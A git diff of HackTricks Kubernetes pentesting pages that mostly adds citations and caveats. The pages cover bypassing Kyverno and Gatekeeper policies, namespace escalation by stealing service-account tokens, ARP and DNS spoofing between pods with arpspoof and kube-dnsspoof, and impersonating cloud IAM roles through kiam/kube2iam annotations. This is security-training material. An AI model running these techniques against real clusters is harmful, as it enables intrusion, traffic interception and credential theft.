-Another way to bypass policies is to focus on the ValidatingWebhookConfiguration resource :
+Another way to bypass policies is to focus on the `ValidatingWebhookConfiguration` resource and its request-matching behavior.<sup>[[4]](#references)</sup>
 
 {{#ref}}
 ../kubernetes-validatingwebhookconfiguration.md
@@ -64,6 +68,14 @@ Another way to bypass policies is to focus on the ValidatingWebhookConfiguration
 
 ## More info
 
-For more info check [https://madhuakula.com/kubernetes-goat/docs/scenarios/scenario-22/securing-kubernetes-clusters-using-kyverno-policy-engine/welcome/](https://madhuakula.com/kubernetes-goat/docs/scenarios/scenario-22/securing-kubernetes-clusters-using-kyverno-policy-engine/welcome/)
+For more info, see [Securing Kubernetes Clusters using Kyverno Policy Engine](https://madhuakula.com/kubernetes-goat/docs/scenarios/scenario-22/securing-kubernetes-clusters-using-kyverno-policy-engine/welcome/).<sup>[[5]](#references)</sup>
+
+## References
+
+- [1] [Overview | Kyverno](https://kyverno.io/docs/policy-types/cluster-policy/overview/)
+- [2] [Selecting Resources | Kyverno](https://kyverno.io/docs/policy-types/cluster-policy/match-exclude/)
+- [3] [User Impersonation | Kubernetes](https://kubernetes.io/docs/reference/access-authn-authz/user-impersonation/)
+- [4] [ValidatingWebhookConfiguration | Kubernetes](https://kubernetes.io/docs/reference/kubernetes-api/admissionregistration/validating-webhook-configuration-v1/)
+- [5] [Securing Kubernetes Clusters using Kyverno Policy Engine | Kubernetes Goat](https://madhuakula.com/kubernetes-goat/docs/scenarios/scenario-22/securing-kubernetes-clusters-using-kyverno-policy-engine/welcome/)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md
@@ -2,13 +2,15 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**.
+In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**. Namespaces scope namespaced resources and RBAC bindings determine whether a principal can act in another namespace, so a foothold in one namespace does not imply access to another.<sup>[[1]](#references)[[3]](#references)</sup>
 
 Here are some techniques you can try to escape to a different namespace:
 
 ### Abuse K8s privileges
 
-Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens.
+Obviously, if the account you stole has sensitive privileges in the namespace you want to reach, you can abuse actions such as **creating pods** with service accounts in that namespace, **executing** a shell in an existing pod, or reading **Secret** objects that contain service-account credentials. Check these permissions independently: RBAC treats `pods/exec` as a separate subresource from `pods`, and access to `secrets` must be granted explicitly.<sup>[[2]](#references)[[3]](#references)</sup>
+
+A Pod normally receives credentials for its assigned ServiceAccount, unless automounting is disabled. Modern Kubernetes generally uses short-lived projected tokens; legacy long-lived token Secrets may still exist when manually created, so inspect the actual credential mechanism before relying on it.<sup>[[2]](#references)</sup>
 
 For more info about which privileges you can abuse read:
 
@@ -18,11 +20,11 @@ abusing-roles-clusterroles-in-kubernetes/
 
 ### Escape to the node
 
-If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens:
+If you can escape to the node either because you have compromised a pod and can escape or because policy and admission controls allow you to create a privileged pod and escape, you could do several things to steal other SAs' tokens. The privileged Pod profile is intentionally unrestricted and can bypass typical container-isolation mechanisms, but the result still depends on the runtime and cluster controls.<sup>[[2]](#references)[[4]](#references)</sup>
 
-- Check for **SAs tokens mounted in other docker containers** running in the node
-- Check for new **kubeconfig files in the node with extra permissions** given to the node
-- If enabled (or enable it yourself) try to **create mirrored pods of other namespaces** as you might get access to those namespaces default token accounts (I haven't tested this yet)
+- Check for **SA tokens mounted in other containers** running on the node (including Docker-managed containers where that runtime is still used).<sup>[[2]](#references)</sup>
+- Check for new **kubeconfig files on the node with extra permissions** granted to the node identity; kubeconfig files can contain cluster, user, namespace, and authentication information.<sup>[[3]](#references)[[7]](#references)</sup>
+- If static Pods are enabled (or you can enable them yourself), investigate creating a **static Pod with an API-visible mirror Pod in another namespace**. The kubelet creates mirror Pods, but they cannot be controlled through the API server, and static Pod specs cannot reference ServiceAccounts, ConfigMaps, or Secrets; therefore the idea that this provides another namespace's default token account is untested and is not automatic.<sup>[[2]](#references)[[5]](#references)[[6]](#references)</sup>
 
 All these techniques are explained in:
 
@@ -30,7 +32,15 @@ All these techniques are explained in:
 attacking-kubernetes-from-inside-a-pod.md
 {{#endref}}
 
+## References
+
+- [1] [Namespaces | Kubernetes](https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/)
+- [2] [Service Accounts | Kubernetes](https://kubernetes.io/docs/concepts/security/service-accounts/)
+- [3] [Using RBAC Authorization | Kubernetes](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
+- [4] [Pod Security Standards | Kubernetes](https://kubernetes.io/docs/concepts/security/pod-security-standards/)
+- [5] [Static Pods | Kubernetes](https://kubernetes.io/docs/concepts/workloads/pods/static-pods/)
+- [6] [Create static Pods | Kubernetes](https://kubernetes.io/docs/tasks/configure-pod-container/static-pod/)
+- [7] [Organizing Cluster Access Using kubeconfig Files | Kubernetes](https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/)
+
 {{#include ../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md
@@ -4,9 +4,9 @@
 
 ## Introduction
 
-In Kubernetes, it is observed that a default behavior permits the establishment of connections between **all containers residing on the same node**. This applies irrespective of the namespace distinctions. Such connectivity extends down to **Layer 2** (Ethernet). Consequently, this configuration potentially exposes the system to vulnerabilities. Specifically, it opens up the possibility for a **malicious container** to execute an **ARP spoofing attack** against other containers situated on the same node. During such an attack, the malicious container can deceitfully intercept or modify the network traffic intended for other containers.
+In Kubernetes, it is observed that a default behavior permits the establishment of connections between **all containers residing on the same node**. This applies irrespective of the namespace distinctions. Such connectivity extends down to **Layer 2** (Ethernet). Consequently, this configuration potentially exposes the system to vulnerabilities. Specifically, it opens up the possibility for a **malicious container** to execute an **ARP spoofing attack** against other containers situated on the same node. During such an attack, the malicious container can deceitfully intercept or modify the network traffic intended for other containers.<sup>[[1]](#references)[[2]](#references)</sup>
 
-ARP spoofing attacks involve the **attacker sending falsified ARP** (Address Resolution Protocol) messages over a local area network. This results in the linking of the **attacker's MAC address with the IP address of a legitimate computer or server on the network**. Post successful execution of such an attack, the attacker can intercept, modify, or even stop data in-transit. The attack is executed on Layer 2 of the OSI model, which is why the default connectivity in Kubernetes at this layer raises security concerns.
+ARP spoofing attacks involve the **attacker sending falsified ARP** (Address Resolution Protocol) messages over a local area network. This results in the linking of the **attacker's MAC address with the IP address of a legitimate computer or server on the network**. Post successful execution of such an attack, the attacker can intercept, modify, or even stop data in-transit. The attack is executed on Layer 2 of the OSI model, which is why the default connectivity in Kubernetes at this layer raises security concerns.<sup>[[2]](#references)</sup>
 
 In the scenario 4 machines are going to be created:
 
@@ -104,18 +104,18 @@ If you want more details about the networking topics introduced here, go to the 
 
 ### ARP
 
-Generally speaking, **pod-to-pod networking inside the node** is available via a **bridge** that connects all pods. This bridge is called “**cbr0**”. (Some network plugins will install their own bridge.) The **cbr0 can also handle ARP** (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP.
+Generally speaking, **pod-to-pod networking inside the node** is available via a **bridge** that connects all pods. This bridge is called “**cbr0**”. (Some network plugins will install their own bridge.) The **cbr0 can also handle ARP** (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP.<sup>[[2]](#references)</sup>
 
-This fact implies that, by default, **every pod running in the same node** is going to be able to **communicate** with any other pod in the same node (independently of the namespace) at ethernet level (layer 2).
+This fact implies that, by default, **every pod running in the same node** is going to be able to **communicate** with any other pod in the same node (independently of the namespace) at ethernet level (layer 2).<sup>[[2]](#references)</sup>
 
 > [!WARNING]
-> Therefore, it's possible to perform A**RP Spoofing attacks between pods in the same node.**
+> Therefore, it's possible to perform A**RP Spoofing attacks between pods in the same node.**<sup>[[2]](#references)</sup>
 
 ### NetworkPolicy and admin policy layers
 
-Kubernetes `NetworkPolicy` is a pod traffic control at L3/L4, but it is enforced by the CNI plugin and not by the API server itself. A cluster can store NetworkPolicy objects while still allowing traffic if the active CNI does not implement them, so always validate with a controlled allowed source and a blocked negative-control source.
+Kubernetes `NetworkPolicy` is a pod traffic control at L3/L4, but it is enforced by the CNI plugin and not by the API server itself. A cluster can store NetworkPolicy objects while still allowing traffic if the active CNI does not implement them, so always validate with a controlled allowed source and a blocked negative-control source.<sup>[[3]](#references)</sup>
 
-Do not stop at `kubectl get networkpolicy -A`. Clusters using Cilium, Calico, OVN-Kubernetes, Antrea, or managed-provider dataplanes may also have policy APIs such as `CiliumNetworkPolicy`, `CiliumClusterwideNetworkPolicy`, Calico `GlobalNetworkPolicy`, `AdminNetworkPolicy`, or `BaselineAdminNetworkPolicy`. These can add explicit deny, tier/order, cluster scope, L7/DNS rules, or admin guardrails that ordinary additive Kubernetes NetworkPolicy semantics do not explain.
+Do not stop at `kubectl get networkpolicy -A`. Clusters using Cilium, Calico, OVN-Kubernetes, Antrea, or managed-provider dataplanes may also have policy APIs such as `CiliumNetworkPolicy`, `CiliumClusterwideNetworkPolicy`, Calico `GlobalNetworkPolicy`, `AdminNetworkPolicy`, or `BaselineAdminNetworkPolicy`. These can add explicit deny, tier/order, cluster scope, L7/DNS rules, or admin guardrails that ordinary additive Kubernetes NetworkPolicy semantics do not explain.<sup>[[3]](#references)[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
 Useful first checks:
 
@@ -131,7 +131,7 @@ For bypass analysis, check whether the intended block is avoided through an allo
 
 ### DNS
 
-In kubernetes environments you will usually find 1 (or more) **DNS services running** usually in the kube-system namespace:
+In kubernetes environments you will usually find 1 (or more) **DNS services running** usually in the kube-system namespace:<sup>[[2]](#references)[[9]](#references)[[12]](#references)</sup>
 
 ```bash
 kubectl -n kube-system describe services
@@ -158,9 +158,9 @@ TargetPort:        9153/TCP
 Endpoints:         172.17.0.2:9153
 ```
 
-In the previous info you can see something interesting, the **IP of the service** is **10.96.0.10** but the **IP of the pod** running the service is **172.17.0.2.**
+In the previous info you can see something interesting, the **IP of the service** is **10.96.0.10** but the **IP of the pod** running the service is **172.17.0.2.**<sup>[[2]](#references)[[9]](#references)</sup>
 
-If you check the DNS address inside any pod you will find something like this:
+If you check the DNS address inside any pod you will find something like this:<sup>[[2]](#references)[[12]](#references)</sup>
 
 ```
 cat /etc/resolv.conf
@@ -169,23 +169,25 @@ nameserver 10.96.0.10
 
 However, the pod **doesn't know** how to get to that **address** because the **pod range** in this case is 172.17.0.10/26.
 
-Therefore, the pod will send the **DNS requests to the address 10.96.0.10** which will be **translated** by the cbr0 **to** **172.17.0.2**.
+Therefore, the pod will send the **DNS requests to the address 10.96.0.10** which will be **translated** by the cbr0 **to** **172.17.0.2**.<sup>[[2]](#references)[[10]](#references)</sup>
 
 > [!WARNING]
 > This means that a **DNS request** of a pod is **always** going to go the **bridge** to **translate** the **service IP to the endpoint IP**, even if the DNS server is in the same subnetwork as the pod.
 >
 > Knowing this, and knowing **ARP attacks are possible**, a **pod** in a node is going to be able to **intercept the traffic** between **each pod** in the **subnetwork** and the **bridge** and **modify** the **DNS responses** from the DNS server (**DNS Spoofing**).
 >
-> Moreover, if the **DNS server** is in the **same node as the attacker**, the attacker can **intercept all the DNS request** of any pod in the cluster (between the DNS server and the bridge) and modify the responses.
+> Moreover, if the **DNS server** is in the **same node as the attacker**, the attacker can **intercept all the DNS request** of any pod in the cluster (between the DNS server and the bridge) and modify the responses.<sup>[[2]](#references)</sup>
 
 > [!NOTE]
-> Validate the active CNI and DNS path before assuming this works in a real cluster. Some CNIs route or isolate same-node traffic differently, and clusters using NodeLocal DNSCache may send pod DNS queries to a node-local address before forwarding to CoreDNS. In those environments, DNS spoofing depends on pod placement, packet capabilities, resolver configuration, node-local cache behavior, and whether applications verify peers with TLS or another identity mechanism.
+> Validate the active CNI and DNS path before assuming this works in a real cluster. Some CNIs route or isolate same-node traffic differently, and clusters using NodeLocal DNSCache may send pod DNS queries to a node-local address before forwarding to CoreDNS. In those environments, DNS spoofing depends on pod placement, packet capabilities, resolver configuration, node-local cache behavior, and whether applications verify peers with TLS or another identity mechanism.<sup>[[2]](#references)[[10]](#references)</sup>
 
 ## ARP Spoofing in pods in the same Node
 
 Our goal is to **steal at least the communication from the ubuntu-victim to the mysql**.
 
 ### Scapy
+
+The following ARP-poisoning program is adapted from the linked Scapy gist.<sup>[[7]](#references)</sup>
 
 ```bash
 python3 /tmp/arp_spoof.py
@@ -264,11 +266,11 @@ arpspoof -t 172.17.0.9 172.17.0.10
 
 ## DNS Spoofing
 
-As it was already mentioned, if you **compromise a pod in the same node of the DNS server pod**, you can **MitM** with **ARPSpoofing** the **bridge and the DNS** pod and **modify all the DNS responses**.
+As it was already mentioned, if you **compromise a pod in the same node of the DNS server pod**, you can **MitM** with **ARPSpoofing** the **bridge and the DNS** pod and **modify all the DNS responses**.<sup>[[2]](#references)</sup>
 
-You have a really nice **tool** and **tutorial** to test this in [**https://github.com/danielsagi/kube-dnsspoof/**](https://github.com/danielsagi/kube-dnsspoof/)
+You have a really nice **tool** and **tutorial** to test this in [**https://github.com/danielsagi/kube-dnsspoof/**](https://github.com/danielsagi/kube-dnsspoof/)<sup>[[8]](#references)</sup>
 
-In our scenario, **download** the **tool** in the attacker pod and create a **file named `hosts`** with the **domains** you want to **spoof** like:
+In our scenario, **download** the **tool** in the attacker pod and create a **file named `hosts`** with the **domains** you want to **spoof** like:<sup>[[8]](#references)</sup>
 
 ```
 cat hosts
@@ -296,13 +298,13 @@ google.com.		1	IN	A	1.1.1.1
 
 > [!NOTE]
 > If you try to create your own DNS spoofing script, if you **just modify the the DNS response** that is **not** going to **work**, because the **response** is going to have a **src IP** the IP address of the **malicious** **pod** and **won't** be **accepted**.\
-> You need to generate a **new DNS packet** with the **src IP** of the **DNS** where the victim send the DNS request (which is something like 172.16.0.2, not 10.96.0.10, thats the K8s DNS service IP and not the DNS server ip, more about this in the introduction).
+> You need to generate a **new DNS packet** with the **src IP** of the **DNS** where the victim send the DNS request (which is something like 172.16.0.2, not 10.96.0.10, thats the K8s DNS service IP and not the DNS server ip, more about this in the introduction).<sup>[[2]](#references)</sup>
 
 ## DNS Spoofing via coreDNS configmap
 
-A user with write permissions over the configmap `coredns` in the kube-system namespace can modify the DNS responses of the cluster.
+A user with write permissions over the configmap `coredns` in the kube-system namespace can modify the DNS responses of the cluster.<sup>[[9]](#references)</sup>
 
-Also review NodeLocal DNSCache if it is deployed. It usually runs as a hostNetwork DaemonSet and has its own ConfigMap, logs, cache, and forwarding path. A CoreDNS change may not be the only place where DNS behavior can be affected or observed.
+Also review NodeLocal DNSCache if it is deployed. It usually runs as a hostNetwork DaemonSet and has its own ConfigMap, logs, cache, and forwarding path. A CoreDNS change may not be the only place where DNS behavior can be affected or observed.<sup>[[10]](#references)</sup>
 
 Check more information about this attack in:
 
@@ -343,12 +345,21 @@ kubectl get crd | grep -i policy
 ## Capturing Traffic
 
 The tool [**Mizu**](https://github.com/up9inc/mizu) is a simple-yet-powerful API **traffic viewer for Kubernetes** enabling you to **view all API communication** between microservices to help your debug and troubleshoot regressions.\
-It will install agents in the selected pods and gather their traffic information and show you in a web server. However, you will need high K8s permissions for this (and it's not very stealthy).
+It will install agents in the selected pods and gather their traffic information and show you in a web server. However, you will need high K8s permissions for this (and it's not very stealthy).<sup>[[11]](#references)</sup>
 
 ## References
 
-- [https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1)
-- [https://blog.aquasec.com/dns-spoofing-kubernetes-clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)
+- [1] [Attacking Kubernetes Clusters Through Your Network Plumbing: Part 1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1)
+- [2] [DNS Spoofing on Kubernetes Clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)
+- [3] [Network Policies | Kubernetes](https://kubernetes.io/docs/concepts/services-networking/network-policies/)
+- [4] [Network Policy | Cilium](https://docs.cilium.io/en/stable/network/kubernetes/policy/)
+- [5] [Get started with Calico network policy](https://docs.tigera.io/calico/latest/network-policy/get-started/calico-policy/calico-network-policy)
+- [6] [API Reference - Network Policy API](https://network-policy-api.sigs.k8s.io/reference/spec/)
+- [7] [ARPSpoofer.py](https://gist.github.com/rbn15/bc054f9a84489dbdfc35d333e3d63c87)
+- [8] [kube-dnsspoof](https://github.com/danielsagi/kube-dnsspoof)
+- [9] [Debugging DNS Resolution | Kubernetes](https://kubernetes.io/docs/tasks/administer-cluster/dns-debugging-resolution/)
+- [10] [Using NodeLocal DNSCache in Kubernetes Clusters](https://kubernetes.io/docs/tasks/administer-cluster/nodelocaldns/)
+- [11] [Mizu README (commit 69ee875)](https://github.com/up9inc/mizu/blob/69ee8752d032ad9bf25a3cc4f7392fde9d619b81/README.md)
+- [12] [DNS for Services and Pods | Kubernetes](https://kubernetes.io/docs/concepts/services-networking/dns-pod-service/)
 
 {{#include ../../banners/hacktricks-training.md}}
-

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md
@@ -6,7 +6,9 @@
 
 ## Definition
 
-Open Policy Agent (OPA) Gatekeeper is a tool used to enforce admission policies in Kubernetes. These policies are defined using Rego, a policy language provided by OPA. Below is a basic example of a policy definition using OPA Gatekeeper:
+Open Policy Agent (OPA) Gatekeeper is a tool used to enforce admission policies in Kubernetes. These policies are defined using Rego, a policy language provided by OPA. Below is a basic example of a policy definition using OPA Gatekeeper.<sup>[[1]](#references)[[2]](#references)</sup>
+
+**Original example (retained verbatim; buggy comprehension):**
 
 ```rego
 package k8srequiredlabels
@@ -22,11 +24,31 @@ violation[{"msg": msg}] {
 default allow = false
 ```
 
-This Rego policy checks if certain labels are present on Kubernetes resources. If the required labels are missing, it returns a violation message. This policy can be used to ensure that all resources deployed in the cluster have specific labels.
+This Rego policy checks if certain labels are present on Kubernetes resources. If the required labels are missing, it returns a violation message. This policy can be used to ensure that all resources deployed in the cluster have specific labels.<sup>[[3]](#references)</sup>
+
+The original example above is retained verbatim, but its `required` comprehension references `label` before binding it and OPA rejects it for the object-shaped `labels` parameter. The current valid form is shown separately below; it iterates the parameter object's keys, while the values act as truthy flags and are not compared with the resource's label values.<sup>[[4]](#references)</sup>
+
+**Current valid example (corrected `required` comprehension):**
+
+```rego
+package k8srequiredlabels
+
+violation[{"msg": msg}] {
+    provided := {label | input.review.object.metadata.labels[label]}
+    required := {label | input.parameters.labels[label]}
+    missing := required - provided
+    count(missing) > 0
+    msg := sprintf("Required labels missing: %v", [missing])
+}
+
+default allow = false
+```
 
 ## Apply Constraint
 
-To use this policy with OPA Gatekeeper, you would define a **ConstraintTemplate** and a **Constraint** in Kubernetes:
+To use this policy with OPA Gatekeeper, you would define a **ConstraintTemplate** and a **Constraint** in Kubernetes.<sup>[[3]](#references)</sup>
+
+**Original `ConstraintTemplate` YAML (retained verbatim):**
 
 ```yaml
 apiVersion: templates.gatekeeper.sh/v1beta1
@@ -53,6 +75,8 @@ spec:
         default allow = false
 ```
 
+The `ConstraintTemplate` YAML above repeats the original buggy expression for comparison; use the current valid policy example above when applying the template.<sup>[[4]](#references)</sup>
+
 ```yaml
 apiVersion: constraints.gatekeeper.sh/v1beta1
 kind: K8sRequiredLabels
@@ -69,13 +93,16 @@ spec:
       requiredLabel2: "true"
 ```
 
-In this YAML example, we define a **ConstraintTemplate** to require labels. Then, we name this constraint `ensure-pod-has-label`, which references the `k8srequiredlabels` ConstraintTemplate and specifies the required labels.
+In this YAML example, we define a **ConstraintTemplate** to require labels. Then, we name this constraint `ensure-pod-has-label`, which references the `k8srequiredlabels` ConstraintTemplate and specifies the required labels.<sup>[[3]](#references)</sup>
 
-When Gatekeeper is deployed in the Kubernetes cluster, it will enforce this policy, preventing the creation of pods that do not have the specified labels.
+When Gatekeeper is deployed in the Kubernetes cluster, it will enforce this policy, preventing the creation of pods that do not have the specified labels.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ## References
 
-* [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper)
+- [1] [Gatekeeper repository](https://github.com/open-policy-agent/gatekeeper)
+- [2] [Introduction | Gatekeeper](https://open-policy-agent.github.io/gatekeeper/website/docs/)
+- [3] [How to use Gatekeeper | Gatekeeper](https://open-policy-agent.github.io/gatekeeper/website/docs/howto/)
+- [4] [Policy Language | Open Policy Agent](https://www.openpolicyagent.org/docs/policy-language#variable-keys)
 
 
 

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md
@@ -19,7 +19,7 @@ k8smandatorylabels                                                              
 constrainttemplates                                                                 templates.gatekeeper.sh/v1                         false        ConstraintTemplate
 ```
 
-**ConstraintTemplate** and **Constraint** can be used in Open Policy Agent (OPA) Gatekeeper to enforce rules on Kubernetes resources.
+**ConstraintTemplate** and **Constraint** are Gatekeeper CRDs used to define and enforce policies on Kubernetes resources.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
 $ kubectl get constrainttemplates
@@ -28,7 +28,7 @@ $ kubectl get k8smandatorylabels
 
 #### With the GUI
 
-A Graphic User Interface may also be available to access the OPA rules with **Gatekeeper Policy Manager.** It is "a simple _read-only_ web UI for viewing OPA Gatekeeper policies' status in a Kubernetes Cluster."
+A Graphic User Interface may also be available to access the OPA rules with **Gatekeeper Policy Manager.** It is a read-only web UI for viewing the status of OPA Gatekeeper policies in a Kubernetes cluster.<sup>[[2]](#references)</sup>
 
 <figure><img src="../../../images/05-constraints.png" alt=""><figcaption></figcaption></figure>
 
@@ -41,11 +41,11 @@ $ kubectl get services -A | grep 'gatekeeper-policy-manager-system'
 
 ### Excluded namespaces
 
-As illustrated in the image above, certain rules may not be applied universally across all namespaces or users. Instead, they operate on a whitelist basis. For instance, the `liveness-probe` constraint is excluded from applying to the five specified namespaces.
+As illustrated in the image above, certain rules may not be applied universally across all namespaces or users. Gatekeeper match criteria can explicitly exclude selected namespaces.<sup>[[4]](#references)</sup> For instance, the `liveness-probe` constraint is excluded from applying to the five specified namespaces.
 
 ### Bypass
 
-With a comprehensive overview of the Gatekeeper configuration, it's possible to identify potential misconfigurations that could be exploited to gain privileges. Look for whitelisted or excluded namespaces where the rule doesn't apply, and then carry out your attack there.
+With a comprehensive overview of the Gatekeeper configuration, it's possible to identify potential misconfigurations that could be exploited to gain privileges. Look for whitelisted or excluded namespaces where the rule doesn't apply.<sup>[[3]](#references)[[4]](#references)</sup> Then carry out your attack there.
 
 {{#ref}}
 ../abusing-roles-clusterroles-in-kubernetes/
@@ -53,7 +53,7 @@ With a comprehensive overview of the Gatekeeper configuration, it's possible to 
 
 ## Abusing ValidatingWebhookConfiguration
 
-Another way to bypass constraints is to focus on the ValidatingWebhookConfiguration resource :
+Another way to bypass constraints is to focus on the `ValidatingWebhookConfiguration` resource and its matching behavior.<sup>[[5]](#references)</sup>
 
 {{#ref}}
 ../kubernetes-validatingwebhookconfiguration.md
@@ -61,8 +61,11 @@ Another way to bypass constraints is to focus on the ValidatingWebhookConfigurat
 
 ## References
 
-- [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper)
-- [https://github.com/sighupio/gatekeeper-policy-manager](https://github.com/sighupio/gatekeeper-policy-manager)
+- [1] [Open Policy Agent Gatekeeper](https://github.com/open-policy-agent/gatekeeper)
+- [2] [Gatekeeper Policy Manager](https://github.com/sighupio/gatekeeper-policy-manager)
+- [3] [How to use Gatekeeper](https://open-policy-agent.github.io/gatekeeper/website/docs/howto/)
+- [4] [Exempting Namespaces](https://open-policy-agent.github.io/gatekeeper/website/docs/exempt-namespaces/)
+- [5] [ValidatingWebhookConfiguration | Kubernetes](https://kubernetes.io/docs/reference/kubernetes-api/admissionregistration/validating-webhook-configuration-v1/)
 
 
 

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md
@@ -50,9 +50,9 @@ kubectl annotate serviceaccount <service-account-name> \
 
 ### GKE Workload Identity
 
-With Workload Identity, we can configure a[ Kubernetes service account](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/) to act as a[ Google service account](https://cloud.google.com/iam/docs/understanding-service-accounts). Pods running with the Kubernetes service account will automatically authenticate as the Google service account when accessing Google Cloud APIs.
+With Workload Identity, we can configure a[ Kubernetes service account](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/) to act as a[ Google service account](https://cloud.google.com/iam/docs/understanding-service-accounts). Pods running with the Kubernetes service account will automatically authenticate as the Google service account when accessing Google Cloud APIs. <sup>[[2]](#references)[[14]](#references)[[15]](#references)</sup>
 
-The **first series of steps** to enable this behaviour is to **enable Workload Identity in GCP** ([**steps**](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c)) and create the GCP SA you want k8s to impersonate.
+The **first series of steps** to enable this behaviour is to **enable Workload Identity in GCP** ([**steps**](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c)) and create the GCP SA you want k8s to impersonate. <sup>[[1]](#references)[[2]](#references)</sup>
 
 - **Enable Workload Identity** on a new cluster
 
@@ -144,7 +144,7 @@ gcloud auth activate-service-account --key-file=/var/run/secrets/google/service-
 
 > [!WARNING]
 > As an attacker inside K8s you should **search for SAs** with the **`iam.gke.io/gcp-service-account` annotation** as that indicates that the SA can access something in GCP. Another option would be to try to abuse each KSA in the cluster and check if it has access.\
-> From GCP is always interesting to enumerate the bindings and know **which access are you giving to SAs inside Kubernetes**.
+> From GCP is always interesting to enumerate the bindings and know **which access are you giving to SAs inside Kubernetes**. <sup>[[1]](#references)</sup>
 
 This is a script to easily **iterate over the all the pods** definitions **looking** for that **annotation**:
 
@@ -163,7 +163,7 @@ done | grep -B 1 "gcp-service-account"
 
 ### Kiam & Kube2IAM (IAM role for Pods) <a href="#workflow-of-iam-role-for-service-accounts" id="workflow-of-iam-role-for-service-accounts"></a>
 
-An (outdated) way to give IAM Roles to Pods is to use a [**Kiam**](https://github.com/uswitch/kiam) or a [**Kube2IAM**](https://github.com/jtblin/kube2iam) **server.** Basically you will need to run a **daemonset** in your cluster with a **kind of privileged IAM role**. This daemonset will be the one that will give access to IAM roles to the pods that need it.
+An (outdated) way to give IAM Roles to Pods is to use a [**Kiam**](https://github.com/uswitch/kiam) or a [**Kube2IAM**](https://github.com/jtblin/kube2iam) **server.** Basically you will need to run a **daemonset** in your cluster with a **kind of privileged IAM role**. This daemonset will be the one that will give access to IAM roles to the pods that need it. <sup>[[16]](#references)[[17]](#references)</sup>
 
 First of all you need to configure **which roles can be accessed inside the namespace**, and you do that with an annotation inside the namespace object:
 
@@ -197,12 +197,12 @@ metadata:
 ```
 
 > [!WARNING]
-> As an attacker, if you **find these annotations** in pods or namespaces or a kiam/kube2iam server running (in kube-system probably) you can **impersonate every r**ole that is already **used by pods** and more (if you have access to AWS account enumerate the roles).
+> As an attacker, if you **find these annotations** in pods or namespaces or a kiam/kube2iam server running (in kube-system probably) you can **impersonate every r**ole that is already **used by pods** and more (if you have access to AWS account enumerate the roles). <sup>[[16]](#references)[[17]](#references)</sup>
 
 #### Create Pod with IAM Role
 
 > [!NOTE]
-> The IAM role to indicate must be in the same AWS account as the kiam/kube2iam role and that role must be able to access it.
+> The IAM role to indicate must be in the same AWS account as the kiam/kube2iam role and that role must be able to access it. <sup>[[16]](#references)[[17]](#references)</sup>
 
 ```yaml
 echo 'apiVersion: v1
@@ -222,12 +222,12 @@ spec:
 
 ### IAM Role for K8s Service Accounts via OIDC <a href="#workflow-of-iam-role-for-service-accounts" id="workflow-of-iam-role-for-service-accounts"></a>
 
-This is the **recommended way by AWS**.
+This is the **recommended way by AWS**. <sup>[[18]](#references)[[19]](#references)</sup>
 
-1. First of all you need to [create an OIDC provider for the cluster](https://docs.aws.amazon.com/eks/latest/userguide/enable-iam-roles-for-service-accounts.html).
+1. First of all you need to [create an OIDC provider for the cluster](https://docs.aws.amazon.com/eks/latest/userguide/enable-iam-roles-for-service-accounts.html). <sup>[[18]](#references)</sup>
 2. Then you create an IAM role with the permissions the SA will require.
-3. Create a [trust relationship between the IAM role and the SA](https://docs.aws.amazon.com/eks/latest/userguide/associate-service-account-role.html) name (or the namespaces giving access to the role to all the SAs of the namespace). _The trust relationship will mainly check the OIDC provider name, the namespace name and the SA name_.
-4. Finally, **create a SA with an annotation indicating the ARN of the role**, and the pods running with that SA will have **access to the token of the role**. The **token** is **written** inside a file and the path is specified in **`AWS_WEB_IDENTITY_TOKEN_FILE`** (default: `/var/run/secrets/eks.amazonaws.com/serviceaccount/token`)
